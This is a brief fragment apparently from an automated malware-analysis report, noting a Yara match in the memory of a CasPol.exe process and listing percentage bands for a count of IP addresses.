Source: Yara match File source: Process Memory Space: CasPol.exe PID: 4560, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs